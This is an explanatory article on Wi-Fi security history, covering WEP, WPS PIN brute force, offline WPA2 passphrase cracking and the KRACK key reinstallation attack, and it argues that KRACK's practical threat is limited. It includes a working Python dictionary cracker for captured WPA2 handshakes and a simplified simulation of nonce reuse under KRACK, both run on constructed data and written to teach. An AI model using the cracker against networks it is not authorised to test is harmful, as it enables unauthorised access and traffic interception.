One of the most ubiquitous ways of accessing the Internet today is through IEEE 802.11, the family of wireless networking standards commonly known as Wi-Fi. Throughout its highly impactful existence, 802.11 has seen massive adoption and implementation in nearly every organization and institution.
From the behemoth Fortune 500 companies to the small home office, Wi-Fi is in nearly every device. However, rapid adoption has also led to inconsistent implementation and a constant barrage of attempts to find vulnerabilities in the protocol's security mechanisms. Most recently, the Key Reinstallation Attack (KRACK) against the WPA2 four-way handshake has created a fervor within the cybersecurity community and many of the aforementioned organizations. However, examining the vulnerability seriously, in the context of other wireless vulnerabilities, shows that while it is a serious issue, its usefulness as an attack vector is limited.
A comprehensive understanding of the KRACK vulnerability requires a closer look at Wi-Fi as a communication protocol and at its history of exploitation. Exploiting wireless is much like buying a home: it is all about 'location, location, location!' That is what makes Wi-Fi convenient for those deploying it and infuriating for those attempting to exploit it. Continuing the analogy, many homeowners use Wi-Fi to forgo the costly experience of installing cabled communications such as Ethernet or fiber. Wi-Fi also lets people move freely within the home and carry laptops and tablets from room to room without worrying about a wall outlet. This level of convenience was unprecedented in the early days of Wi-Fi adoption, yet the focus on ease came at the cost of security.
The first Wi-Fi encryption protocol to be broken was Wired Equivalent Privacy (WEP). Many users mistook it for a suitable security protocol, and it saw wide use in the early 2000s. It did not take security researchers and hackers long to find the inherent weaknesses in WEP: it encrypts with RC4 under a single static key shared by every device on the network, combined with a short 24-bit initialization vector that repeats quickly on a busy network. An attacker who passively listens long enough collects enough frames with weak or repeated initialization vectors to recover the key, exposing all network traffic as it is transmitted. As understanding of this weakness spread, adoption of Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) grew.
The benefits of WPA and WPA2 become obvious under close inspection. Rather than encrypting everything under one static key, each association runs a four-way handshake between the access point and the client in which both sides contribute a random nonce; the session key (the pairwise transient key, PTK) is derived from the shared secret and those nonces, so it is different every time a device connects, and the shared secret itself never crosses the air. Two attacks on WPA/WPA2-Personal followed. In late 2011, security researchers showed that Wi-Fi Protected Setup (WPS), the PIN-based convenience feature on many consumer routers, validated its eight-digit registrar PIN in two halves, so an attacker within range could brute-force it online in at most about 11,000 attempts and have the router hand over the WPA/WPA2 passphrase; this needs no special processing power, only a router with the WPS PIN method enabled. The other attack is the offline dictionary attack: because the WPA/WPA2-Personal key is derived from the passphrase and the network name, an attacker who captures one complete four-way handshake can test candidate passphrases offline against the message integrity code in that handshake. That process is slow (each guess costs 4096 rounds of PBKDF2), it only succeeds against weak passphrases, and decrypting any particular client's traffic additionally requires capturing that client's own handshake, since every session key is different, which is what makes the attack difficult against a well-chosen passphrase.
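The following is an added example, not code from the original article: it derives the WPA2-Personal keys the way the standard specifies (PBKDF2 for the PMK, PRF-512 for the PTK, HMAC-SHA1 for the message 2 MIC) and then runs the offline dictionary attack described above against a handshake it constructs itself. The MAC addresses, nonces, SSID, passphrase, EAPOL bytes and word list are all constructed sample values, and the message 2 bytes are a stand-in for a real EAPOL-Key frame rather than a faithful frame layout.

```python
"""WPA2-Personal key derivation and the offline attack on a captured four-way handshake.

Added example (not from the original article). Key derivation follows IEEE 802.11 for
WPA2-PSK with CCMP; every sample value below is constructed, not captured.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step that makes dictionary attacks slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, cut to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key: fresh per association because ANonce/SNonce change each time.
    Addresses and nonces are sorted so that both sides derive the same PTK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def split_ptk(ptk: bytes):
    """CCMP layout: KCK (MIC key) | KEK (key-wrap key) | TK (data-encryption key)."""
    return ptk[:16], ptk[16:32], ptk[32:48]


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[:16]."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


@dataclass(frozen=True)
class CapturedHandshake:
    """What a passive sniffer gets from messages 1 and 2 of the handshake."""
    ssid: str
    aa: bytes       # authenticator (AP) MAC address
    spa: bytes      # supplicant (client) MAC address
    anonce: bytes   # from message 1
    snonce: bytes   # from message 2
    msg2: bytes     # EAPOL-Key message 2 with its MIC field zeroed
    mic: bytes      # the MIC the client actually sent in message 2


def make_capture(passphrase, ssid, aa, spa, anonce, snonce, msg2) -> CapturedHandshake:
    """Play the legitimate client's side so the example has a realistic capture to attack."""
    kck, _, _ = split_ptk(derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce))
    return CapturedHandshake(ssid, aa, spa, anonce, snonce, msg2, eapol_mic(kck, msg2))


def crack_psk(cap: CapturedHandshake, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: a candidate passphrase is right iff it reproduces the MIC."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, cap.ssid)
        kck, _, _ = split_ptk(derive_ptk(pmk, cap.aa, cap.spa, cap.anonce, cap.snonce))
        if hmac.compare_digest(eapol_mic(kck, cap.msg2), cap.mic):
            return candidate
    return None


# Constructed sample values (not a real capture).
AA = bytes.fromhex("001122334455")
SPA = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"constructed ANonce").digest()   # nonces are 32 bytes
SNONCE = hashlib.sha256(b"constructed SNonce").digest()
MSG2 = b"\x02\x03" + b"\x00" * 30 + SNONCE                 # stand-in message 2 bytes, MIC zeroed
SSID = "ExampleNet"
PASSPHRASE = "correct horse battery"
CAPTURE = make_capture(PASSPHRASE, SSID, AA, SPA, ANONCE, SNONCE, MSG2)
WORDLIST = ["password", "letmein", "Summer2017", "correct horse battery", "admin123"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(CAPTURE, WORDLIST))
```

The cost of the attack sits entirely in derive_pmk: one PBKDF2 run per guess, with nothing the attacker can precompute except per-SSID rainbow tables. Note also that the PTK changes with every nonce pair, so the captured handshake only unlocks the session it was captured from, even once the passphrase is known.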
KRACK is different because it subverts the four-way handshake itself. The standard allows the access point to retransmit message 3 of the handshake if it receives no reply, and a client that accepts the retransmission installs the session key again, resetting the packet number and replay counter that go with it; hence the name Key Reinstallation Attack. The key the client reinstalls is the key already in use, so the damage comes not from a weaker key but from the reset counters: under WPA2's CCMP encryption the packet number forms part of the nonce, and a nonce reused under the same key means the same keystream encrypts two different frames, which lets an attacker who captured both decrypt them, and lets frames the client has already accepted be replayed to it. Where TKIP or GCMP is in use, the attacker can also forge frames, and in wpa_supplicant 2.4 and 2.5 (the supplicant on Android 6 and many Linux systems) the client clears the key from memory after installing it, so a replayed message 3 installs an all-zero key and the attacker can decrypt and inject everything. Much of WPA2's protection rests on never reusing a nonce under a session key, and this attack breaks exactly that. It is both ingenious and concerning.
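The reinstallation mechanism described above, as an added example that is not from the original article or from any vendor's supplicant code. It models a simplified CCMP client: installing the key resets the transmit packet number and the receive replay counter, a man-in-the-middle replays message 3, and the attacker recovers a frame from the reused keystream. The keystream function is a stand-in for AES-CCM's counter mode that keeps only the property that matters here (same key and same nonce give the same keystream), the HTTP-like frames are constructed sample data, and the patched behaviour is modelled on the fix the vendors shipped, namely refusing to reinstall a key that is already in use.

```python
"""Key reinstallation in a simplified CCMP client: why a replayed message 3 leaks data.

Added example (not from the original article). The Client class is a model, not a real
supplicant; keystream() stands in for AES-CTR and shares only its determinism in (key, nonce).
"""
import hashlib
import hmac
from typing import Optional, Tuple


def keystream(tk: bytes, nonce: bytes, length: int) -> bytes:
    """Stand-in for the AES-CTR keystream: deterministic in (key, nonce), as the real one is."""
    out = b""
    block = 0
    while len(out) < length:
        out += hmac.new(tk, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        block += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Client:
    """Supplicant view of the key state after the four-way handshake."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.tk: Optional[bytes] = None
        self.tx_pn = 0     # CCMP packet number: the per-frame part of the nonce
        self.rx_pn = 0     # highest packet number accepted from the AP (replay check)

    def handle_msg3(self, tk: bytes) -> bool:
        """Message 3 tells the client to install the TK. The standard lets the AP retransmit
        message 3, so an unpatched client installs the same key again and resets both
        counters: that is the KRACK bug. Returns True if a key was installed."""
        if self.patched and self.tk == tk:
            return False   # fix: a key that is already installed is never reinstalled
        self.tk = tk
        self.tx_pn = 0
        self.rx_pn = 0
        return True

    def encrypt(self, plaintext: bytes) -> Tuple[bytes, bytes]:
        """Returns (nonce, ciphertext). The real CCMP nonce is priority || sender MAC || PN;
        only the PN varies for one sender, so the model keeps just the PN."""
        self.tx_pn += 1
        nonce = self.tx_pn.to_bytes(6, "big")
        return nonce, xor(plaintext, keystream(self.tk, nonce, len(plaintext)))

    def accept_from_ap(self, pn: int) -> bool:
        """Replay protection: a frame is accepted only if its PN exceeds the last one seen."""
        if pn <= self.rx_pn:
            return False
        self.rx_pn = pn
        return True


def attack(patched: bool) -> Tuple[bool, bytes, bool]:
    """The attacker sits as a man-in-the-middle, records ciphertext, and replays message 3.
    Returns (nonce_reused, plaintext_recovered_by_attacker, replay_accepted)."""
    tk = hashlib.sha256(b"constructed session TK").digest()[:16]
    known = b"GET /index.html HTTP/1.1"   # frame whose plaintext the attacker can predict
    secret = b"Cookie: session=a1b2c3d4"  # frame the attacker wants; same length as `known`

    client = Client(patched)
    client.handle_msg3(tk)
    n1, c1 = client.encrypt(known)
    client.accept_from_ap(pn=5)           # a genuine AP frame with PN 5 is accepted

    client.handle_msg3(tk)                # attacker replays message 3
    n2, c2 = client.encrypt(secret)       # unpatched: PN restarted, same nonce as n1

    # Two ciphertexts under one keystream: c1 XOR c2 = known XOR secret.
    recovered = xor(xor(c1, c2), known)
    replay_accepted = client.accept_from_ap(pn=5)   # the PN 5 frame replayed to the client
    return n1 == n2, recovered, replay_accepted


if __name__ == "__main__":
    for patched in (False, True):
        reused, recovered, replayed = attack(patched)
        print(f"patched={patched} nonce_reused={reused} replay_accepted={replayed} "
              f"recovered={recovered!r}")
```

Running it with patched=False recovers the cookie line and accepts the replayed frame; with patched=True the second message 3 is ignored, the nonces differ, and the XOR yields nothing useful. The decryption needs nothing from the passphrase or the PTK, which is why KRACK applies equally to WPA2-Personal and WPA2-Enterprise.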
While the concern over KRACK is merited, especially considering the damage it can do to an individual, it is important to view it holistically. The attack still depends on two prerequisites: the attacker must get between the client and the access point in order to withhold and replay handshake messages, and the attacker must be physically placed to do so. Both are harder than with remote attack vectors, thanks to the nature of Wi-Fi.
First, the attacker needs a man-in-the-middle position on the radio link, in practice by cloning the real access point's identity on a different channel and getting the client to talk to the clone, so that message 3 of the handshake can be held back and replayed at the attacker's chosen moment. Environmental factors such as walls and signal noise from other devices and networks make this delicate in many real environments, because the clone has to be the stronger signal at the client's location. Second, proximity is required. Unless the attacker invests in amplifiers and directional antennas, surreptitious execution of a KRACK attack is difficult; again, success is all about location, location, location.
When KRACK is viewed in the context of Wi-Fi as a communications protocol and the previous vulnerabilities in its security mechanisms, it becomes clear that it does not change the basics of security practice. While the exploitation itself is ingenious, proper security hygiene still protects the average user.
Using a virtual private network (VPN) at public hotspots (or not using public hotspots at all) continues to protect the individual abroad, as does the end-to-end encryption of HTTPS, which KRACK on its own does not break. Concerns in the office are mitigated by patching: the bug is in the client side of the handshake, so the fix goes on laptops, phones and embedded devices, and on access points only where they use 802.11r fast roaming or act as clients themselves (repeaters and mesh nodes); the fix is backward compatible, so a patched client stays protected even when talking to an unpatched access point. Finally, at home, one needs to consider whether a malicious actor will take the time to come within radio range and set up the man-in-the-middle position the attack requires (an attacker who is in range can force a client to reassociate rather than wait for one, so the patch still matters, but the visit is still required). Considering these factors, KRACK, while certainly a legitimate threat, is not as worrisome for the individual as some may think.